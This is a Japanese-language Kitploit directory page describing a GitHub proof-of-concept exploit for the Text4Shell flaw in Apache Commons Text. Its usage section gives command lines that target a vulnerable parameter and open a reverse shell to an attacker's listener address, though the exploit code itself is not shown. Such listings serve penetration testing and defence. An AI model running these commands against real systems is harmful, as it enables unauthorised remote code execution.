Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-42889-text4shell — Proof of Concept (PoC) for CVE-2022-42889 (Text4Shell) targeting Apache Commons Text versions prior to 1.10.0. This script automates Remote Code Execution (RCE) via script interpolation to establish a reverse shell. This version is a structured optimization based on the original exploit found at Exploit-DB (ID: 52261). | Kitploit
ツール/GitHubGitHub/goultarde/cve-2022-42889-text4shell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubgoultarde/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →

概要

Proof of Concept (PoC) for CVE-2022-42889 (Text4Shell) targeting Apache Commons Text versions prior to 1.10.0. This script automates Remote Code Execution (RCE) via script interpolation to establish a reverse shell. This version is a structured optimization based on the original exploit found at Exploit-DB (ID: 52261).

リポジトリを見る
1ヶ月前未レビュー
共有

CVE-2022-42889-text4shell

説明

このスクリプトは、Apache Commons Text(バージョン < 1.10.0)に存在する CVE-2022-42889 脆弱性(別名 Text4Shell)を悪用するために設計されたペネトレーションテストツールです。リバースシェルを発動させる Java ベースのペイロードの配信を自動化します。

この実装は公開エクスプロイトに基づいています: https://www.exploit-db.com/exploits/52261

特徴

  • argparse を使用したコマンドライン引数による、使いやすさの向上。
  • Java ペイロードの互換性を確保するための正確な URL エンコーディング。
  • カスタマイズ可能なパスと脆弱なパラメータのターゲット。

使用方法

前提条件

このスクリプトには Python 3 と requests ライブラリが必要です。

root@kitploit:~
pip install requests

構文

root@kitploit:~
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT

例

root@kitploit:~
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139

免責事項

このツールは教育目的および許可されたペネトレーションテストのみを対象としています。作者は、このスクリプトの誤用またはそれによって生じた損害について一切の責任を負いません。

ツールをダウンロード